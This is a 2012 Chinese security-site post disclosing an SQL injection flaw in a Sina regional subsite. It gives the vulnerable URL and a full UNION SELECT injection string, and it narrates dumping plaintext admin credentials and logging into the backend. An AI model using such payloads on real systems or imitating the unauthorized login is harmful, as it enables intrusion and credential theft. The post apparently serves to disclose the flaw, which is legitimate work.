频道栏目
首页 > 安全 > 网站安全 > 正文

新浪某城市联盟分站存在SQL注入漏洞

2012-06-10 15:46:51           
收藏   我要投稿
SQL注入点:http://spring.sina-qd.com/more.php?class_id=39
 
获取库名及其他信息:
http://spring.sina-qd.com/more.php?class_id=39%20and%201=2%20UNION%20SELECT%201,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29--
 


获取当前用户、库名及数据库版本,居然是mysql4.0的,蛋疼得要命...
 
 


不过还好rp不错,能猜出用户表及列名,哈哈
 
 
 
密码竟然是明文的
 
 
 
看到该网站有一个可疑的管理目录manage,在G搜索引擎中找到了后台地址
 
 
 
从刚才得到的帐号密码直接进后台,找上传??绕过??不深挖了,怕影响不好 www.2cto.com
 
 
 
还找到个fckeditor编辑器,版本不高,之前有个针对php+fck的漏洞利用,不试了,看图吧!已经有人光顾了,赶紧修复吧。
 
 
 
修复方案:问题都找出来了,相信管理员会知道该怎样修复
版权声明:转载请注明来源fido
上一篇:众乐活动平台建站系统sql注射及修复
下一篇:联想扬天品牌子站SQL注射漏洞
相关文章
图文推荐
文章
推荐
热门新闻

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站